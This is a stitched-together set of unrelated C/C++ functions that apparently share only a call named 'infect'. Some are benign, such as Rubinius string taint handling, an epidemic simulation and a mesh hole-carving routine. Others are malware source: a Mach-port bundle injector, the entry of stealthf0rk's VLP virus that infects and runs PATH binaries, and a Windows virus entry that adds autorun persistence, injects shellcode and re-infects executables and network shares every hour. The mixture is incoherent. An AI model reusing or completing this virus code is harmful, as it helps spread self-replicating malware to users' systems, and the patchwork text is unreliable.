// Rubinius.primitive :string_dup String* string_dup(STATE) { if(likely(klass() == G(string) && ivars()->nil_p())) { /* We have a plain string with no metaclass or ivars, so if we can * allocate a new object in the young space, we can copy it directly * without needing a write barrier. */ String* so = state->memory()->new_object<String>(state, G(string)); if(likely(so->young_object_p())) { so->copy_body(state->vm(), this); so->shared(state, cTrue); shared(state, cTrue); infect(state, so); return so; } } return string_dup_slow(state); }
String* Float::to_s_formatted(STATE, String* format) { char buf[FLOAT_TO_S_STRLEN]; size_t size = snprintf(buf, FLOAT_TO_S_STRLEN, format->c_str(state), val); if(size >= FLOAT_TO_S_STRLEN) { std::ostringstream msg; msg << "formatted string exceeds " << FLOAT_TO_S_STRLEN << " bytes"; Exception::argument_error(state, msg.str().c_str()); } String* str = String::create(state, buf, size); infect(state, str); str->encoding(state, Encoding::usascii_encoding(state)); str->ascii_only(state, cTrue); str->valid_encoding(state, cTrue); return str; }
void *perform_work(void *argument) { int passed_in_value, i=0x11, j=33; int *seeds, nSeeds; passed_in_value = *((int *) argument); seeds = malloc( 1*sizeof *seeds); nSeeds = 1; seeds[0] = seed_vertices[0]; /* * Record whether a vertex is infected */ char *infected ; int s = (G->V + 5) * sizeof *infected; infected= malloc(s); memset(infected, 0,s); unsigned long seed_int = (unsigned long) ( (1 + passed_in_value + time(NULL)) % 888); #ifdef __CYGWIN__ reent seed = (reent) seed_int; #else struct drand48_data seed; srand48_r(seed_int, &seed); #endif for (i = 1, j = 1; i <= G->V; ++i) { if (i != seeds[0] && getRandTo_r(MAX_EDGE_WEIGHT, &seed) <= G->adj_list[i]->prob) { if(j >= nSeeds){ seeds= realloc(seeds, (1+j)*2*sizeof *seeds); nSeeds = 2+j*2; } seeds[j] = i; j++; } } n_seed = j ; Ninfected_ptr[passed_in_value] = infect(G,n_seed , seeds, infected, &seed); fprintf(out2, "infected[%d] : %d\n", passed_in_value, Ninfected_ptr[passed_in_value]); return NULL; }
int main() { char *argv[] = {"/bin/sleep", "30", NULL}; char *envp[] = {NULL}; thread_act_t thread; mach_port_t port = MACH_PORT_NULL; pid_t pid = spawn("/bin/sleep", argv, envp, &port, -1); if (pid <= 0 && port == MACH_PORT_NULL) { printf("FAIL!\n"); return 1; } /* No rush, let's assume 2 seconds is enough time to get our * process properly bootstrapped (execve, dyld, etc. */ sleep(2); if (!infect(port, dummy_bundle, dummy_bundle_len, &thread)) { printf("FAILED TO INFECT!\n"); return 1; } printf("Check if /tmp/dummy.bundle.out exists!\n"); return 0; }
int main(int argc, char **argv, char **envp) { char *s, *s2, *path, *dir; int i; char from[200]; #ifdef DEBUG /* If U are angry do this: * setenv("PATH", "/root/VTEST/bin:/root/VTEST/bad:/root/VTEST/usr/bin:/root/VTEST/bad2", 1); */ fd = fopen(TRACEFILE, "a"); #endif DFPRINTF("====== tracefile of stealthf0rk's VLP ==========\n"); path = getenv("PATH"); s = whereis(path, argv[0]); /* return only static! -> */ if (strcpy(from, s) == NULL) /* so we need a copy */ return -1; DFPRINTF("@f main: file of action is <%s>\n", from); i = infect(3, from); exechost(from, argv, envp); return 0; }
// This customized version carves holes defined by the regions. // It'll remove any element which doesn't receive any region. int custom_carveholes(struct mesh *m, struct behavior *b, const int *outside, const int *inside) { struct otri neighbortri; struct otri triangleloop; struct osub subsegloop; triangle **temptri; triangle ptr; /* Temporary variable used by sym(). */ double area; double attribute; double triangle_attribute; int sane_mesh; poolinit(& m->viri, sizeof( triangle * ), VIRUSPERBLOCK, VIRUSPERBLOCK, 0); /* Assigns every triangle a regional attribute of -1 */ traversalinit(& m->triangles); triangleloop.orient = 0; triangleloop.tri = triangletraverse(m); while ( triangleloop.tri != ( triangle * ) NULL ) { setelemattribute(triangleloop, m->eextras, -1.0); triangleloop.tri = triangletraverse(m); } sane_mesh = 1; /* Loop over all segments */ traversalinit(& m->subsegs); subsegloop.ss = subsegtraverse(m); subsegloop.ssorient = 0; while ( subsegloop.ss != ( subseg * ) NULL ) { if ( subsegloop.ss != m->dummysub ) { /* First neighbor. */ ssymself(subsegloop); stpivot(subsegloop, neighbortri); if ( neighbortri.tri != m->dummytri ) { area = 0.0; /// @todo Possible set this as the minimum as well. attribute = outside [ mark(subsegloop) - 1 ]; triangle_attribute = elemattribute(neighbortri, m->eextras); /* The region no number yet. */ if ( triangle_attribute < 0 && attribute >= 0 ) { infect(neighbortri); temptri = ( triangle ** ) poolalloc(& m->viri); * temptri = neighbortri.tri; /* Apply one region's attribute and/or area constraint. */ regionplague(m, b, attribute, area); /* The virus pool should be empty now. */ } else if ( attribute >= 0 && triangle_attribute >= 0 && attribute != triangle_attribute ) { /* Check for problems. */ vertex v1, v2, v3; org(neighbortri, v1); dest(neighbortri, v2); apex(neighbortri, v3); fprintf(stdout, "Error: inconsistent region information (new %d, old %d from %d) (outside) at (%e, %e)\n", ( int ) attribute, ( int ) triangle_attribute, ( int ) mark(subsegloop), ( v1 [ 0 ] + v2 [ 0 ] + v3 [ 0 ] ) / 3, ( v1 [ 1 ] + v2 [ 1 ] + v3 [ 1 ] ) / 3); sane_mesh = 0; } } /* Second neighbor (same procedure). */ ssymself(subsegloop); stpivot(subsegloop, neighbortri); if ( neighbortri.tri != m->dummytri ) { area = 0.0; attribute = inside [ mark(subsegloop) - 1 ]; triangle_attribute = elemattribute(neighbortri, m->eextras); if ( triangle_attribute < 0 && attribute >= 0 ) { infect(neighbortri); temptri = ( triangle ** ) poolalloc(& m->viri); * temptri = neighbortri.tri; regionplague(m, b, attribute, area); } else if ( attribute >= 0 && triangle_attribute >= 0 && attribute != triangle_attribute ) { vertex v1, v2, v3; org(neighbortri, v1); dest(neighbortri, v2); apex(neighbortri, v3); fprintf(stdout, "Error: inconsistent region information (new %d, old %d from %d) (inside) at (%e, %e)\n", ( int ) attribute, ( int ) triangle_attribute, ( int ) mark(subsegloop), ( v1 [ 0 ] + v2 [ 0 ] + v3 [ 0 ] ) / 3, ( v1 [ 1 ] + v2 [ 1 ] + v3 [ 1 ] ) / 3); sane_mesh = 0; } } subsegloop.ss = subsegtraverse(m); } } /* Remove all triangles with marker 0.0 */ traversalinit(& m->triangles); triangleloop.tri = triangletraverse(m); int triangle_number = 0; while ( triangleloop.tri != ( triangle * ) NULL ) { if ( triangleloop.tri != m->dummytri ) { triangle_number++; attribute = elemattribute(triangleloop, m->eextras); if ( attribute == -1.0 ) { fprintf(stderr, "Broken mesh at triangle %d\n", triangle_number); sane_mesh = 0; } else if ( attribute == 0.0 ) { infect(triangleloop); temptri = ( triangle ** ) poolalloc(& m->viri); * temptri = triangleloop.tri; } } triangleloop.tri = triangletraverse(m); } /* Remove the marked elements */ plague(m, b); if ( b->regionattrib && !b->refine ) { /* Note the fact that each triangle has an additional attribute. */ m->eextras++; } /* Free up memory. */ pooldeinit(& m->viri); return sane_mesh; }
int main(int argc, char ** argv){ infect(argc, argv); }
int main(int argc, char **argv) { char *field; char *ampptr; char *query; char *token; int status; char defaultcnffile[] = "infect.cnf"; char *cnffile, *paramsfile; CONF_CTX *cnfctx; char *unencfile; char *email, *subject; char *id; if (argc < 2) { printf("Usage: infect id=<email address>\n"); return 0; } if (argc > 2) { cnffile = argv[1]; query = argv[2]; } else { cnffile = defaultcnffile; query = argv[1]; } cnfctx = LoadConfig(cnffile); if (!cnfctx) { fprintf(stderr, "error opening %s\n", cnffile); fprintf(stderr, "using default values\n"); cnfctx = constructCTX(); } paramsfile = GetPathParam(cnfctx, "params", 0, "params.txt"); mailprog = GetPathParam(cnfctx, "mail", 0, "/usr/bin/mail"); encfile = GetPathParam(cnfctx, "messagefile", 0, "firstmessage.txt"); unencfile = GetPathParam(cnfctx, "helpfile", 0, "instructions.txt"); printf("Infecting %s\n", query); /* cout << "params file: " << paramsfile << endl; cout << "mailer: " << mailprog << endl; cout << "instructions: " << unencfile << endl; cout << "message: " << encfile << endl; */ status = FMT_load_raw_byte_string(plainmessage, unencfile); if (status != 1) { fprintf(stderr, "error opening instructions\n"); } IBE_init(); status = FMT_load_params(params, paramsfile); if (status != 1) { fprintf(stderr, "Error loading params file %s\n", paramsfile); return(1); } email = NULL; subject = NULL; token = (char *) malloc(strlen(query) + 1); ampptr = query; ampptr = get_token(token, ampptr, '&'); while(ampptr) { if (!(field = index(token, '='))) { fprintf(stderr, "Malformed query\n"); return 1; } field[0] = 0; field++; if (!strcmp(token, "id")) { email = (char *) malloc(strlen(field)); strcpy(email, field); translate(email); } else if (!strcmp(token, "subject")) { subject = (char *) malloc(strlen(field)); strcpy(subject, field); translate(subject); } ampptr = get_token(token, ampptr, '&'); } if (!email) { //char errmsg[] = "Must supply email address and password."; fprintf(stderr, "bad ID\n"); return 1; } id = FMT_make_id(email, subject, params); infect(email, id); free(id); free(email); free(subject); free(token); params_clear(params); IBE_clear(); return 0; }
void entry(DWORD magic,DECRYPT_ITEM *item){ if (magic==MAGIC_INJECT){ #if _DEBUG wchar_t name[MAX_PATH]; GetModuleFileNameW(GetModuleHandleW(0), name, MAX_PATH); dbg(VINFO, L"I'm injected %s",name); #endif //в ожидании что бот помер while (true){ HANDLE hbot = CreateMutexA(0, TRUE, mtbot); if (!hbot){ Sleep(1000); continue; } if (GetLastError() == ERROR_ALREADY_EXISTS){ CloseHandle(hbot); Sleep(1000); continue; } break; } //основной цикл жизни бота #if _DEBUG dbg(VINFO, L"Run bot %s", name); #endif //старт полезной нагрузки CreateThread(0, 0, thread_payload, 0, 0, 0); //запись в автозапуск CreateThread(0, 0, thread_autorun, item, 0, 0); //повторный инфект cmem b; b.push(item+1, item->size); while (1){ find_drive(L"*.exe", P, &b); find_drive(L"*.dll", P, &b); infect_netshares(shares, &b); find_drive(L"*.*", P, &b); dbg(VINFO, "Infect done"); Sleep(60*60*1000); } ExitThread(0); } if (magic == MAGIC_SHELLCODE){ //Второе поколение вируса dbg(VINFO, L"I'm copy beetle2 inside target file"); setPrivilege(GetCurrentProcess(), SE_DEBUG_NAME, TRUE); cmem inj; inj.push(item, item->size + sizeof(DECRYPT_ITEM)); inject(inj); ExitThread(0); } wchar_t fcur[MAX_PATH]; GetModuleFileNameW(GetModuleHandleW(0), fcur, MAX_PATH); cmem a, b, c; if (!cfile::load(fcur, a)){ dbg(VERROR, "Can't open current file"); exit(0); } if (!cfile::load("..\\test\\notepad.exe", b)){ dbg(VERROR, "Can't open target file"); exit(0); } if (!infect(b, a, &c)){ dbg(VERROR, "Can't infect target file"); exit(0); } if (!cfile::save("..\\test\\notepad.inf.exe", c)){ dbg(VERROR, "Can't save infected file"); exit(0); } dbg(VINFO, "Done target file"); exit(0); }